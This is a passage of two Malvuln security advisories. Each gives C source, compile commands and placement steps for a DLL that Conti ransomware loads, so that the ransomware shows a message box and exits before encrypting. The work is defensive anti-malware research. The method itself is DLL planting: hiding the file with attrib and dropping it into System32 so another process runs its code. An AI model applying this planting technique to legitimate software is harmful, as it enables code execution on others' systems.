3c55ee6753408bff2e3e6a392ed9f2a0<br />SHA256: 0b0b902af452e1c949a609a3b29a9de21dac639846c77427de06e6e63c1fe904<br />Vuln ID: MVID-2022-0580<br />Disclosure: 05/03/2022<br />Video Poc URL: https://www.youtube.com/watch?v=H8TDDklcrPo<br /><br />Exploit/PoC:<br />1) Compile the following C code as "netapi32.dll"<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "netapi32.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br />#include "stdio.h"<br /><br />//By malvuln<br />//Purpose: Code Execution<br />//Target: Ransom.Conti<br />//MD5: 3c55ee6753408bff2e3e6a392ed9f2a0<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c netapi32.c -m32<br />//gcc -shared -o netapi32.dll netapi32.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/710a77804637f65e22a2e230ff6444f9.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Conti.Ransom<br />Vulnerability: Code Execution<br />Description: Conti looks for and loads a DLL named "wow64log.dll" in Windows\System32. Therefore, we can drop our own DLL to intercept and terminate the malware pre-encryption. The exploit dll will simply display a Win32API message box and call exit(). Our Conti.Ransom exploit DLL must export "InterlockedExchange" function or it fails with error. We do not need to rely on hash signature or third-party product, the malware will do the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as theres nothing to kill the DLL just lives on disk waiting. From defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Conti<br />Type: PE32<br />MD5: 710a77804637f65e22a2e230ff6444f9<br />SHA256: 0aaacd11d8b956d317489d060e72946d28ab6aef9be1b541aff9904a750f4b51<br />Vuln ID: MVID-2022-0579<br />Disclosure: 05/03/2022<br />Video PoC URL: https://www.youtube.com/watch?v=owsev3YTkWA<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Copy the DLL in Windows/System32<br />3) Run the malware and BOOM!<br /><br />#include "windows.h"<br />#include "stdio.h"<br /><br />//By malvuln - 5/2022<br />//MD5: 710a77804637f65e22a2e230ff6444f<br />//TARGET: Conti.Ransom<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c wow64log.c <br />//gcc -shared -o wow64log.dll wow64log.o <br />//must live under Windows/System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange (LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>